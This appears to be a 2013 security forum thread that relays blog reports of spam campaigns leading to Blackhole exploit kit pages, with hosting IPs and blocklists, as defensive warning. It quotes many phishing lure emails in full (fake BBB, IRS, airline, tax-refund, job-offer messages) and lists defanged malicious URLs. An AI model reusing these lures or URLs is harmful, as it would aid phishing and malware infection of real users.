From: Josefina Underwood [mailto:hdFQe @heathrowexpress .com]
Sent: 27 February 2013 16:43
Subject: Follow this link
I have found it http ://www.eurosaudi .com/templates/beez/wps.php?v20120226
Sincerely yours,
Sara Walton
The link is to a legitimate hacked site, and in this case it attempts to bounce to [donotclick]sidesgenealogist .org/closest/c93jfi2jf92ifj39ugh2jfo3g.php but at the time of writing the malware site appears to be overloaded. However, we can find an earlier report for the same sever here* that indicates an exploit kit. The malware is hosted on 188.93.210.226 (Logol.ru, Russia**). I would recommend blocking the entire 188.93.210.0/23 range to be on the safe side. These other two domains are in the same AS and are currently active:
reinstalltwomonthold .org
nephewremovalonly .org
scriptselse .org
everflowinggopayment .net "
* http://urlquery.net/report.php?id=1180853
... Blackholev2 url structure detected... Multiple Exploit Kit Payload detection
** https://www.google.com/safebrowsing/diagnostic?site=AS:49352
___
Fake "Contract" SPAM / forumny .ru
- http://blog.dynamoo.com/2013/02/contract-of-09072011-spam-forumnyru.html
28 Feb 2013 - "This contracts-themed spam leads to malware on forumny .ru:
Date: Thu, 28 Feb 2013 11:43:15 +0400
From: "LiveJournal.com" [do-not-reply @livejournal .com]
Subject: Fw: Contract of 09.07.2011
Attachments: Contract_Scan_IM0826.htm
Dear Sirs,
In the attached file I am forwarding you the Translation of the Loan Contract that I have just received a minute ago. I am really sorry for the delay.
Best regards,
SHERLENE DARBY, secretary
The -attachment- Contract_Scan_IM0826.htm leads to malware on [donotclick]forumny .ru:8080/forum/links/column.php (report here*) on:
31.200.240.153 (Unelink Telecom, Spain)
83.169.41.58 (Host Europe, Germany)
Blocklist:
31.200.240.153
83.169.41.58 ..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1183959
... suspicious URL pattern
... 31.200.240.153 Blackhole 2 Landing Page
___
Fake job offer
- http://blog.dynamoo.com/2013/02/usanewworkcom-fake-job-offer.html
28 Feb 2013 - "This fake job offer will be some illegal activity such as money laundering or reshipping stolen goods:
Date: Thu, 28 Feb 2013 14:57:55 -0600
From: andrzej.wojnarowski@[victimdomain]
Subject: There is a vacancy of a Regional manager in USA:
If you have excellent administrative skills, working knowledge of Microsoft Office,
a keen eye for detail, well-versed in the use of social networking sites such as Twitter and Facebook,
are organized, present yourself well and are a team player with the ability to work independently,
are reliable and punctual and can understand and execute instructions are determined to work hard and succeed - we need you.
If you are interested in this job, please, send us your contact information:
Full name:
Country:
City:
E-mail:
Please email us for details: Paulette @usanewwork .com
In this case the email originated from 187.246.25.58, a Mega Cable customer in Guadalajara, Mexico. The domain is registered to an address that does not exist (there is no Pratt Avenue in Tukwila):
Sarah Shepard info @usanewwork .com
360-860-3630 fax: 360-860-3321
4478 Pratt Avenue
Tukwila WA 98168
us
The domain was only registered two days ago on 28/2/13. The nameservers ns1.stageportal .net and ns2.stageportal .net are shared by several other domains offering similar fake jobs...
IP addresses involved are:
5.135.90.19 (OVH, France)
69.169.90.62 (Big Brain Host, US)
199.96.86.139 (Microglobe LLC, US)
This job offer is best avoided unless you like prison food..."
(More detail at the dynamoo URL above.)
___
Fake BBB SPAM / forumnywrk .ru
- http://blog.dynamoo.com/2013/02/bbb-spam-forumnywrkru.html
28 Feb 2013 - "This fake BBB Spam leads to malware on forumnywrk .ru:
Date: Thu, 28 Feb 2013 07:29:10 -0500 [07:29:10 EST]
From: LinkedIn Password [password @linkedin .com]
Subject: Urgent information from BBB
Attn: Owner/Manager
Here with the Better Business Bureau notifies you that we have received a complaint (ID 832708632)
from one of your customers with respect to their dealership with you.
Please open the COMPLAINT REPORT below to obtain more information on this matter and let us know of your point of view as soon as possible.
We are looking forward to your prompt reply.
Regards,
VERSIE Stringer
The malicious payload is on [donotclick]forumnywrk .ru:8080/forum/links/column.php hosted on:
31.200.240.153 (Unelink Telecom, Spain)
83.169.41.58 (Host Europe, Germany)
Blocklist:
83.169.41.58
31.200.240.153 ..."
(More detail at the dynamoo URL above.)
:mad:
AplusWebMaster
2013-03-01, 17:51
FYI...
Casino-themed Blackhole sites
- http://blog.dynamoo.com/2013/03/casino-themed-blackhole-sites.html
1 March 2013 - "Here's a a couple of URLs that look suspicious like a BlackHole Exploit kit, hosted on 130.185.105.74:
[donotclick]888casino-luckystar .net/discussing/sizes_agreed.php
[donotclick]555slotsportal .org/discussing/alternative_distance.php
[donotclick]555slotsportal .net/shrift.php
[donotclick]555slotsportal .net/discussing/alternative_distance.php
[donotclick]555slotsportal .me/discussing/alternative_distance.php
[donotclick]sexstreamsmatez .biz/discussing/alternative_distance.php
You can find a sample report here*... there's nothing of value here and these sites are probably malicious and should be blocked. You might want to consider blocking 130.185.105.0/24 too..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1199381
... Detected BlackHole v2.0 exploit kit URL pattern
:mad::fear:
AplusWebMaster
2013-03-04, 19:14
FYI...
Fake Delta Airlines SPAM / inanimateweaknesses .net and complainpaywall .net
- http://blog.dynamoo.com/2013/03/delta-airlines-spam-inanimateweaknesses.html
4 March 2013 - "This fake Delta Airlines spam leads to malware on inanimateweaknesses .net and complainpaywall .net:
From: DELTA CONFIRMATION [mailto:cggQozvOc @sutaffu .co.jp]
Sent: 04 March 2013 14:27
Subject: Your Receipt and Itinerary
Thank you for choosing Delta. We encourage you to review this information before your trip.
If you need to contact Delta or check on your flight information, go to delta.com/itineraries
Now, managing your travel plans just got easier. You can exchange, reissue and refund electronic tickets at delta .com/itineraries.
Take control and make changes to your itineraries at delta.com/itineraries.
Speed through the airport. Check-in online for your flight.
Check-in
Flight Information
DELTA CONFIRMATION #: D0514B3
TICKET #: 00920195845933
Bkng Meals/ Seat/
Day Date Flight Status Class City Time Other Cabin
--- ----- --------------- ------ ----- ------------
Mon 11MAR DELTA 372 OK H LV NYC-KENNEDY 820P F 19C
AR SAN FRANCISCO 8211P COACH
Fri 15MAR DELTA 1721 OK H LV LOS ANGELES 1145P V 29A
AR NYC-KENNEDY 812A# COACH
Check your flight information online at delta.com/itineraries
The email contains several links to different hacked sites, which then forward to [donotclick]inanimateweaknesses .net/closest/c93jfi2jf92ifj39ugh2jfo3g.php (report here*) or [donotclick]complainpaywall .net/closest/c93jfi2jf92ifj39ugh2jfo3g.php (report here**) both of which are hosted on 188.93.211.156 (Logol.ru, Russia). In my opinion 188.93.210.0/23 is a bit of a sewer and should be blocked if you can, as there are probably many other malicious sites nearby.
Of note is that the links in the email only seem to work with a correct referrer and user agent. If those are not set, then you will not end up at the malware page."
* http://urlquery.net/report.php?id=1246850
... Detected BlackHole v2.0 exploit kit URL pattern ... Detected live BlackHole v2.0 exploit kit
** http://urlquery.net/report.php?id=1246854
... Detected BlackHole v2.0 exploit kit URL pattern ... Detected live BlackHole v2.0 exploit kit
___
Fake eFax SPAM / forumla .ru
- http://blog.dynamoo.com/2013/03/efax-spam-forumlaru.html
4 Mar 2013- "This fake eFax spam leads to malware on forumla .ru:
Date: Mon, 4 Mar 2013 08:53:20 +0300
From: LinkedIn [welcome @linkedin .com]
Subject: Efax Corporate
Attachments: Efax_Corporate.htm
Fax Message [Caller-ID: 646370000]
You have received a 57 pages fax at Mon, 4 Mar 2013 08:53:20 +0300, (213)-406-0113.
* The reference number for this fax is [eFAX-336705661].
View attached fax using your Internet Browser.
© 2013 j2 Global Communications, Inc. All rights reserved.
eFax ® is a registered trademark of j2 Global Communications, Inc.
This account is subject to the terms listed in the eFax ® Customer Agreement.
The malicious payload is at [donotclick]forumla .ru:8080/forum/links/column.php (report here*) hosted on 210.71.250.131 (Chungwa Telecom, Taiwan). These other sites are also visible on the same IP:
foruminanki .ru
ny-news-forum .ru
forumilllionois .ru
forum-ny .ru
forumny .ru
forumla .ru"
* http://urlquery.net/report.php?id=1247054
... Detected suspicious URL pattern... Detected live BlackHole v2.0 exploit kit
___
Fake dealerbid .co.uk SPAM
- http://blog.dynamoo.com/2013/03/dealerbidcouk-spam.html
4 March 2013 - "This -spam- uses an email address ONLY used to sign up for dealerbid .co.uk
From: HM Revenue & Customs [enroll @hmrc .gov.uk]
Date: 4 March 2013 13:37
Subject: HMRC Tax Refund ID: 3976244
Dear Taxpayer,
After the last annual calculations of your fiscal activity we have discovered that you are eligible to receive a tax refund of 377.50 GBP. Kindly complete the tax refund request and allow 2-3 working days to process it.
A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline. Please click on the attached file in order to access the form for your tax refund.
Currently we are only able to process tax refunds through "LloydsTSB". Alternatively, you can wait for the next few weeks to apply for a full refund through additional financial institutions(Banks).
Kind regards,
Paul McWeeney
Head of Consumer Sales and Service
The email got horribly mangled on the way and luckily whatever payload came with it is buggered. Of interest though, the email originates from 78.136.27.79 which is home to the following websites:
everybodyonline .co.uk
uk-car-discount .co.uk
The email address has been -stolen- from one UK motoring related site, and the spam sent through the hacked server of another UK motoring site. That's a peculiar coincidence, although I do not believe that those site operators are responsible for this spam run. It looks like I am not the only person to notice this same problem*.."
* http://www.reviewcentre.com/Car-Dealers/Dealerbid-www-dealerbid-co-uk-review_1884815
___
Fake Justin Bieber social media claims
- http://www.hoax-slayer.com/bieber-dies-crash-hoax.shtml
March 4, 2013 - "Outline: Message circulating via social media claims that popular young singing star Justin Bieber has died in a car accident...
> http://www.hoax-slayer.com/images/bieber-crash-hoax.jpg
... Many of these false death rumours originate from several tasteless "prank" websites that allow users to create fake news stories detailing the supposed death of various celebrities. Users can generally pick from several "news" templates, add the name of their chosen celebrity and then attempt to fool their friends by sharing the -bogus- story..."
___
Fake Facebook email/SPAM 'Violation of Terms' - Phishing Scam
- http://www.hoax-slayer.com/facebook-page-phishing-scam.shtml
March 4, 2013 - "Outline: Inbox message purporting to be from "Mark Zurckerberg" claims that the user's Facebook Page has violated the Facebook Terms of Service and may be permanently deleted unless the account is verified by clicking a link in the message... There have been a number of variations of these Facebook account phishing scams distributed in recent years. If you receive any message that claims that your Facebook account may be disabled or deleted if you do not verify account details, do not click on any links or attachments that it may contain. It is always safest to login to your Facebook account - and other online accounts - by entering the address into your browser's address bar rather than by following a link."
:mad::fear:
AplusWebMaster
2013-03-05, 14:08
FYI...
New Java exploits centered exploit kit
- http://blog.webroot.com/2013/03/05/cybercriminals-release-new-java-exploits-centered-exploit-kit/
March 5, 2013 - "... its current version is entirely based on Java exploits (CVE-2012-1723 and CVE-2013-0431), naturally, with “more exploits to be introduced any time soon”... More details:
Sample screenshot of the statistics page of the newly released Web malware exploitation kit:
> https://webrootblog.files.wordpress.com/2013/03/web_malware_exploitation_kit_statistics_loads.png
The majority of affected users are U.S.-based hosts, and the majority of infected operating systems are Windows NT 6.1, followed by Windows XP... according to the cybercriminals pitching the kit, they’ve also managed to infect some Mac OS X hosts... competing Web malware exploitation kits tend to exploit a much more diversified set of client-side vulnerabilities, consequently, achieving higher exploitation rates... In the wake of two recently announced Java zero day vulnerabilities, users are advised to disable Java, as well as to ensure that they’re not running any outdated versions of their third-party software and browser plugins."
- http://seclists.org/fulldisclosure/2013/Mar/38
4 Mar 2013 - "... 5 -new- security issues were discovered in Java SE 7..."
___
Fake British Airways SPAM / forum-la .ru
- http://blog.dynamoo.com/2013/03/british-airways-e-ticket-receipts-spam.html
4 March 2013 - "This fake British Airways spam leads to malware on forum-la .ru:
From: LiveJournal.com [do-not-reply @livejournal .com]
Date: 4 March 2013 12:17
Subject: British Airways E-ticket receipts
e-ticket receipt
Booking reference: 9AZ3049885
Dear,
Thank you for booking with British Airways.
Ticket Type: e-ticket
This is your e-ticket receipt. Your ticket is held in our systems, you will not receive a paper ticket for your booking.
Your itinerary is attached (Internet Exlplorer/Mozilla Firefox file)
Yours sincerely,
British Airways Customer Services
British Airways may monitor email traffic data and also the content of emails, where permitted by law, for the purposes of security and staff training and in order to prevent or detect unauthorised use of the British Airways email system.
British Airways Plc is a public limited company registered in England and Wales. Registered number: 79805156. Registered office: Waterside, PO Box 365, Harmondsworth, West Drayton, Middlesex, England, UB7 0GB.
How to contact us
Although we are unable to respond to individual replies to this email we have a comprehensive section that may help you if you have a question about your booking or travelling with British Airways.
If you require further assistance you may contact us
If you have received this email in error
This is a confidential email intended only for the British Airways Customer appearing as the addressee. If you are not the intended recipient please delete this email and inform the snder as soon as possible. Please note that any copying, distribution or other action taken or omitted to be taken in reliance upon it is prohibited and may be unlawful.
The email has an attachment named E-Ticket-N93892PK.htm which attempts to direct the victim to a malware page at [donotclick]forum-la .ru:8080/forum/links/column.php (report here*) hosted on:
198.104.62.49 (NTT America, US)
210.71.250.131 (Chungwa Telecom, Taiwan)
Blocklist:
198.104.62.49
210.71.250.131
forumla .ru
forumny .ru
forum-la .ru
foruminanki .ru
ny-news-forum .ru
forumilllionois .ru
forum-ny .ru ..."
* http://www.urlquery.net/report.php?id=1251838
... Detected suspicious URL pattern
___
iFrame injections drive traffic to Blackhole exploit kit
- http://nakedsecurity.sophos.com/2013/03/05/rogue-apache-modules-iframe-blackhole-exploit-kit/
March 5, 2013 - "... recent attacks against legitimate websites that are being used to drive unsuspecting user traffic to the Blackhole exploit sites. JavaScript libraries on the legitimate websites are prepended with code... SophosLabs has seen huge volumes of legitimate sites being compromised in this way in recent weeks. In fact, Mal/Iframe-AL has been the most prevalent web threat detected on customer endpoints and web appliances for the past few weeks, accounting for almost 30% of all detected web threats! If we correlate our malicious URL data against the Alexa top million site data, you can see that these Mal/Iframe-AL injections account for almost two-thirds of all popular sites... have been compromised in some way over the past week.
> https://sophosnews.files.wordpress.com/2013/03/al_alexa.png?w=640
... Looking at data collected over the past 14 days (Feb 18th - March 4th 2013), I started off by looking at the host ISPs for the compromised web sites. As you can see below, a good spread of ISPs have been hit (368 in total), with 18 of them accounting for approximately half of all infected sites.
> https://sophosnews.files.wordpress.com/2013/03/al_isps.png?w=640
Looking at the countries hosting the affected web servers shows the expected spread, somewhat reflective of where hosting providers are based.
> https://sophosnews.files.wordpress.com/2013/03/al_country.png?w=640
If we take a look at the web server platform, the compromised sites are almost exclusively running Apache. This is in contrast to the 60% or so we would expect* if the attacks were agnostic to the platform.
> https://sophosnews.files.wordpress.com/2013/03/al_platform.png?w=640
Most of these servers are running CentOS (then Debian then Ubuntu). This last piece of data gives us some clues as to how these attacks are happening. Could it be a rogue Apache module being used to inject the redirect into content as it is delivered from the server? There have been several other recent attacks doing this. Digging around it appears that this is indeed the root cause. The folks over at Sucuri** managed to get hold of the rogue module that was used on one such victim server.
Administrators or owners of sites that have been affected by these attacks should therefore check their Apache configuration as a matter of urgency and look out for unexpected modules being loaded..."
* http://news.netcraft.com/archives/2012/12/04/december-2012-web-server-survey.html
** http://blog.sucuri.net/2013/02/web-server-compromise-debian-distro-identify-and-remove-corrupt-apache-modules.html
___
Something evil on 5.9.196.3 and 5.9.196.6
- http://blog.dynamoo.com/2013/03/something-evil-on-591963-and-591966.html
5 March 2013 - "Two IPs in the 5.9.196.0/28 block that you probably want to avoid are 5.9.196.3 and 5.9.196.6. The first of these IPs is being used in an injection attack (in this case via [donotclick]frasselt-kalorama .nl/relay.php) leading to two identified malware landing pages:
[donotclick]kisielius.surfwing .me/world/explode_conscious-scandal.jar (report here*)
[donotclick]alkalichlorideasenteeseen.oyunhan .net/world/romance-apparatus_clinical_repay.php (report here**)
Domains visible on 5.9.196.3 include:
alkalichlorideasenteeseen.oyunhan .net
kisielius.surfwing .me
dificilmentekvelijitten.surfwing .me
kisielius.surfwing .me
befool-immatriculation.nanovit .me
locoburgemeester.toys2bsold .com
ratiocination-wselig.smithsisters .us
A few IPs along is 5.9.196.6 which hosts the following domain that also looks highly suspect:
inspegrafstatkakukano.creatinaweb .com
Blocking these domains completely is probably a good idea:
oyunhan .net
surfwing .me
nanovit .me
toys2bsold .com
smithsisters .us
creatinaweb .com
5.9.196.0/28 is a Hetzner IP*** ... I haven't seen anything of value in this /28, blocking it may be prudent."
* http://www.urlquery.net/report.php?id=1248746
... Zip archive data
** http://www.urlquery.net/report.php?id=1265212
... Adobe PDF Memory Corruption
*** https://www.google.com/safebrowsing/diagnostic?site=AS:24940
"... over the past 90 days, 6823 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-03-04, and the last time suspicious content was found was on 2013-03-04..."
___
Fake HP printer SPAM / giliaonso .ru
- http://blog.dynamoo.com/2013/03/scan-from-hewlett-packard-scanjet-spam.html
5 Mar 2013 - "This fake HP printer spam leads to malware on giliaonso .ru:
Date: Tue, 5 Mar 2013 12:53:40 +0500
From: "Classmates . com" [classmatesemail @accounts.classmates .com]
Subject: Fwd: Re: Scan from a Hewlett-Packard ScanJet #161051
Attachments: HP_Scan.htm
Attached document was scanned and sent
to you using a HP A-16292P.
SENT BY : Landon
PAGES : 6
FILETYPE: .HTML [INTERNET EXPLORER/MOZILLA FIREFOX]
The attachment leads to malware on [donotclick]giliaonso .ru:8080/forum/links/column.php (report here*) hosted on the following IPs:
46.4.77.145 (Hetzner, Germany)
198.104.62.49 (NTT America, US)
210.71.250.131 (Chungwa Telecom, Taiwan)
Blocklist:
46.4.77.145
198.104.62.49
210.71.250.131 ..."
* http://urlquery.net/report.php?id=1266289
... Detected suspicious URL pattern... Blackhole 2 Landing Page 210.71.250.131
___
Fake Sendspace SPAM / forumkianko .ru
- http://blog.dynamoo.com/2013/03/sendspace-spam-forumkiankoru.html
5 Mar 2013 - "This fake Sendspace spam leads to malware on forumkianko .ru:
Date: Tue, 5 Mar 2013 06:52:10 +0100
From: AyanaLinney@ [redacted]
Subject: You have been sent a file (Filename: [redacted]-51153.pdf)
Sendspace File Delivery Notification:
You've got a file called [redacted]-01271.pdf, (797.4 KB) waiting to be downloaded at sendspace.(It was sent by DEON VANG).
You can use the following link to retrieve your file:
Download Link
The file may be available for a limited time only.
Thank you,
sendspace - The best free file sharing service.
Please do not reply to this email. This auto-mailbox is not monitored and you will not receive a response.
The malicious payload is at [donotclick]forumkianko .ru:8080/forum/links/column.php (report here*) hosted on:
46.4.77.145 (Hetzner, Germany***)
198.104.62.49 (NTT America, US)
210.71.250.131 (Chungwa Telecom, Taiwan)
These IPs are the same as used in this attack**..."
* http://urlquery.net/report.php?id=1267580
... Detected suspicious URL pattern... Blackhole 2 Landing Page 46.4.77.145
** http://blog.dynamoo.com/2013/03/scan-from-hewlett-packard-scanjet-spam.html
*** https://www.google.com/safebrowsing/diagnostic?site=AS:24940
:mad:
AplusWebMaster
2013-03-06, 19:16
FYI...
Fake BT SPAM / ginagion .ru
- http://blog.dynamoo.com/2013/03/bt-business-direct-order-spam-ginagionru.html
6 March 2013 - "This fake BT spam leads to malware on ginagion .ru:
From: Bebo Service [mailto:service=noreply.bebo .com@bebo .com] On Behalf Of Bebo Service
Sent: 05 March 2013 21:22
Subject: BT Business Direct Order
Notice of delivery
Hi,
We're pleased to confirm that we have now accepted and despatched your order on Wed, 6 Mar 2013 03:21:30 +0600.
Unless you chose a next day or other premium delivery service option, then in most cases your order will arrive within 1-3 days. If we despatched your order via Letterpost, it may take a little longer.
***Please note that your order may have shipped in separate boxes and this means that separate consignment numbers may be applicable***
We've despatched...
..using the attached shipment details...
Courier Ref Carriage method
Royal Mail FM320725534 1-3 Days
Please note that you will only be able to use this tracking reference once the courier has scanned the parcel into their depot. Please allow 24 hours from the date of this email before tracking your parcel online.
For information on how track your delivery, please follow to attached file.
Important information for Yodel deliveries:
If your consignment number starts with 3S3996956 your delivery will require a signature. If there is no-one at the delivery address to sign for the goods a card will be left containing the contact details of the courier so that you can re-arrange delivery or arrange a collection.
The malicious payload is at [donotclick]ginagion .ru:8080/forum/links/column.php ... hosted on:
41.72.150.100 (Hetzner, South Africa)
117.104.150.170 (NTT, Japan)
212.180.176.4 (Supermedia, Poland)
Blocklist:
41.72.150.100
117.104.150.170
212.180.176.4
gosbfosod .ru
giliaonso .ru
forum-ny .ru
ginagion .ru ..."
___
Pizza SPAM / gimalayad .ru
- http://blog.dynamoo.com/2013/03/pizza-spam-gimalayadru.html
6 Mar 2013 - "... This spam actually leads to malware on gimalayad .ru:
Date: Wed, 6 Mar 2013 12:22:04 +0330
From: Tagged [Tagged @taggedmail .com]
Subject: Fwd: Order confirmation
You??™ve just ordered pizza from our site
Pizza Ultimate Cheese Lover's with extras:
Drinks
- Grolsch x 6
- 7up x 3
- Budweiser x 4
- Carling x 2...
If you haven??™t made the order and it??™s a fraud case, please follow the link and cancel the order.
CANCEL ORDER NOW!
If you don??™t do that shortly, the order will be confirmed and delivered to you...
Total Charge: 232.33$
========
Date: Wed, 6 Mar 2013 09:16:56 +0100
From: "Xanga" [noreply @xanga .com]
Subject: Re: Fwd: Order confirmation
You??™ve just ordered pizza from our site
Pizza Ultimate Cheese Lover's with extras:
- Beef
- Pepperoni...
- Extra Sauce
Pizza Italian Trio with extras:
- Beef
- Black Olives...
Drinks
- Simply Orange x 4
- Fanta x 2
- 7up x 2
- Heineken x 2
- Lift x 5
- Pepsi x 4
- Budweiser x 4
Total Charge: 242.67$
If you haven??™t made the order and it??™s a fraud case, please follow the link and cancel the order.
CANCEL ORDER NOW!
If you don??™t do that shortly, the order will be confirmed and delivered to you.
With Respect
PIERO`s Pizzeria
The malicious payload is at [donotclick]gimalayad .ru:8080/forum/links/column.php (report here*) hosted on the same IPs used in this attack:
41.72.150.100 (Hetzner, South Africa)
117.104.150.170 (NTT, Japan)
212.180.176.4 (Supermedia, Poland)
Blocklist:
41.72.150.100
117.104.150.170
212.180.176.4 ..."
* http://www.urlquery.net/report.php?id=1289205
... Detected suspicious URL pattern... Blackhole 2 Landing Page 212.180.176.4
___
Fake inTuit email
- http://security.intuit.com/alert.php?a=76
3/06/13 - "People are receiving fake emails with the title 'Please respond - overdue payment.' These mails are coming from auto-invoice @quickbooks .com, which is -not- a legitimate email address. Below is a copy of the email... The email does not contain a link; however, the email has a .zip attachment that contains malware. Do not open the .zip file.
Please find attached your invoices for the past months. Remit the payment by 02/25/2013 as outlines under our "Payment Terms" agreement.
Thank you for your business,
Sincerely,
Earline Robles
This is the end of the fake email.
Steps to Take Now:
- Do -not- open the attachment in the email...
- Delete the email..."
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Malicious Attachment E-mail Messages - March 06, 2013
Fake Unpaid Debt Invoice E-mail Messages - March 06, 2013
Fake Overdue Payment Notification E-mail Messages - March 06, 2013
Fake Employee Document Sharing Notification E-mail - March 06, 2013
Fake Money Transfer Notification E-mail Messages - March 06, 2013
Fake UPS Payment Document Attachment E-mail Messages - March 06, 2013
(Links and more info at the cisco URL above.)
:mad:
AplusWebMaster
2013-03-07, 16:19
FYI...
Fake BBB SPAM / alteshotel .net and bbb-accredited .net
- http://blog.dynamoo.com/2013/03/bbb-spam-alteshotelnet-and-bbb.html
7 Mar 2013 - "This fake BBB spam leads to malware onalteshotel .net and bbb-accredited .net:
Date: Thu, 7 Mar 2013 06:23:12 -0700
From: "Better Business Bureau Warnings" [hurriese3 @bbb .com]
Subject: BBB details regarding your claim No.
Sorry, your e-mail does not support HTML format. Your messages can be viewed in your browser
Better Business Bureau ©
Start With Trust ©
Thu, 6 March 2013
Your Accreditation Suspended
[redacted]
The Better Business Bureau has been temporary Aborted Your Accreditation
A number of latest complains on you / your company motivated us to temporal Abort your accreditation with Better Business Beaureau. The details of the our decision are available for review at a link below. Please pay attention to this issue and inform us about your glance as soon as possible.
We graciously ask you to overview the TERMINATION REPORT to meet on this claim
-We awaits to your prompt rebound- .
If you think you got this email by mistake - please forward this message to your principal or accountant
Yours respectfully
Hunter Ross
Dispute Advisor
Better Business Bureau
Better Business Bureau
3053 Wilson Blvd, Suite 600 Arlington, VA 25501
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
This information was sent to [redacted]. Don't want to receive these emails anymore? You can unsubscribe
========
Date: Thu, 7 Mar 2013 21:19:18 +0800
From: "Better Business Bureau Warnings" [prettifyingde7 @transfers.americanpayroll .org]
Subject: BBB details about your pretense No.
Sorry, your e-mail does not support HTML format. Your messages can be viewed in your browser
Better Business Bureau ©
Start With Trust ©
Thu, 6 March 2013
Your Accreditation Suspended
[redacted]
The Better Business Bureau has been temporary Aborted Your Accreditation
A number of latest complains on you / your company motivated us to transient Cancell your accreditation with Better Business Beaureau. The details of the our decision are available visiting a link below. Please pay attention to this question and notify us about your belief as soon as possible.
We graciously ask you to visit the ABUSE REPORT to answer on this appeal
- We awaits to your prompt answer. -
If you think you got this email by mistake - please forward this message to your principal or accountant
Faithfully yours
Benjamin Cox
Dispute Councilor
Better Business Bureau
Better Business Bureau
3053 Wilson Blvd, Suite 600 Arlington, VA 24401
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
This letter was sent to [redacted]. Don't want to receive these emails anymore? You can unsubscribe
One potentially malicious payload is at [donotclick]alteshotel .net/detects/review_complain.php (looks like it might be broken - report here*) hosted on:
69.43.161.176 (Parked at Castle Access Inc, US)
The other is at [donotclick]bbb-accredited .net/kill/enjoy-laws-partially-unwanted.php (definitely malicious - report here**) hosted on:
64.207.236.198 (EasyTEL, US)
142.11.195.204 (Hostwinds LLC, US)
149.154.68.214 (TheFirst.RU, Russia) ...
Recommended blocklist:
64.207.236.198
142.11.195.204
149.154.68.214..."
(More detail at the dynamoo uRL above.)
* http://urlquery.net/report.php?id=1302657
** http://urlquery.net/report.php?id=1302670
... Detected live BlackHole v2.0 exploit kit
___
Malware sites to block 7/3/13
- http://blog.dynamoo.com/2013/03/malware-sites-to-block-7313.html
7 March 2013 - "Some Cridex-based nastiness here. These are the malicious domains that I can find on the IPs mentioned, alternatively you can just block:
173.246.102.2 (Gandi, US)
173.255.215.242 (Linode, US)
64.13.172.42 (Silicon Valley Colocation, US)
Blocklist:
173.246.102.2
173.255.215.242
64.13.172.42 ..."
(Long list at the dynamoo URL above.)
:mad::fear:
AplusWebMaster
2013-03-08, 16:02
FYI...
Fake Adobe CS4 SPAM / guuderia .ru
- http://blog.dynamoo.com/2013/03/adobe-cs4-spam-guuderiaru.html
8 March 2013 - "This fake Adobe spam leads to malware on guuderia .ru:
From: messages-noreply@bounce .linkedin .com [mailto:messages-noreply@bounce .linkedin .com] On Behalf Of Donnie Cherry via LinkedIn
Sent: 07 March 2013 12:39
Subject: Order N40898
Good afternoon,
You can download your Adobe CS4 License here -
We encourage you to explore its new and enhanced capabilities with these helpful tips, tutorials, and eSeminars.
Thank you for buying Adobe InDesign CS4 software.
Adobe Systems Incorporated
The malicious payload is at [donotclick]guuderia .ru:8080/forum/links/column.php (report here*) hosted on:
41.72.150.100 (Hetzner, South Africa)
212.180.176.4 (Supermedia, Poland)
Blocklist:
41.72.150.100
212.180.176.4
forum-la .ru
forumla .ru
gimalayad .ru
ginagion .ru
giliaonso .ru
forum-ny .ru
forumny .ru
guuderia .ru
gosbfosod .ru "
* http://urlquery.net/report.php?id=1318046
... Detected suspicious URL pattern... Blackhole 2 Landing Page 212.180.176.4
___
Fake IRS SPAM / gimilako .ru
- http://blog.dynamoo.com/2013/03/your-tax-return-appeal-is-declined.html
8 March 2013 - "This following fake IRS spam leads to malware on gimilako .ru:
From: Myspace [mailto:noreply@message .myspace .com]
Sent: 07 March 2013 20:55
Subject: Your tax return appeal is declined.
Dear Chief Account Officer,
Hereby you are notified that your Income Tax Refund Appeal id#9518045 has been REJECTED. If you believe the IRS did not properly estimate your case due to a misunderstanding of the facts, be prepared to provide additional information. You can obtain the rejection details and re-submit your appeal by using the instructions in the attachment.
Internal Revenue Service
Telephone Assistance for Businesses:
Toll-Free, 1-800-829-4933
Hours of Operation: Monday Friday, 7:00 a.m. 7:00 p.m. your local time (Alaska & Hawaii follow Pacific Time).
The malicious payload is at [donotclick]gimilako .ru:8080/forum/links/column.php (reported here*) hosted on:
41.72.150.100 (Hetzner, South Africa)
89.107.184.167 (WebhostOne, Germany)
212.180.176.4 (Supermedia, Poland)
Blocklist:
41.72.150.100
89.107.184.167
212.180.176.4
gimilako .ru
forum-la .ru
forumla .ru
gimalayad .ru
ginagion .ru
giliaonso .ru
forum-ny .ru
forumny .ru
gosbfosod .ru "
* http://urlquery.net/report.php?id=1321924
... Detected suspicious URL pattern... Blackhole 2 Landing Page 89.107.184.167
___
Fake LinkedIn SPAM / giminalso .ru
- http://blog.dynamoo.com/2013/03/linkedin-spam-giminalsoru.html
8 March 2013 - "This fake LinkedIn spam leads to malware on giminalso .ru:
From: messages-noreply@bounce. linkedin .com [mailto:messages-noreply@bounce .linkedin .com] On Behalf Of LinkedIn Password
Sent: 08 March 2013 10:24
Subject: Aylin is now part of your network. Keep connecting...
[redacted], Congratulations!
You and Aylin are now connected.
Aylin Welsh
Tajikistan
2012, LinkedIn Corporation
The malicious payload is at [donotclick]giminalso .ru:8080/forum/links/column.php (report here*) hosted on the same IPs as in this other attack** today:
41.72.150.100 (Hetzner, South Africa)
89.107.184.167 (WebhostOne, Germany)
212.180.176.4 (Supermedia, Poland)"
* http://urlquery.net/report.php?id=1322125
... Detected suspicious URL pattern... Blackhole 2 Landing Page 41.72.150.100
** http://blog.dynamoo.com/2013/03/your-tax-return-appeal-is-declined.html
___
Fake AT&T spam (again)
- http://blog.dynamoo.com/2013/03/at-spam-again.html
8 Mar 2013 - "This fake AT&T spam leads to malware on.. well, in this case nothing at all.
Date: Fri, 8 Mar 2013 10:37:24 -0500 [10:37:24 EST]
From: AT&T Customer Care [icare7@amcustomercare .att-mail .com]
Subject: Your AT&T wireless bill is ready to view
att.com | Support | My AT&T Account Rethink Possible
Your wireless bill is ready to view
Dear Customer,
Your monthly wireless bill for your account is now available online.
Total Balance Due: -$1695.64-
Log in to myAT&T to view your bill and make a payment. Or register now to manage your account online. By dialing *PAY (*729) from your wireless phone, you can check your balance or make a payment - it's free.
Smartphone users: download the free app to manage your account anywhere, anytime.
Thank you,
AT&T Online Services ...
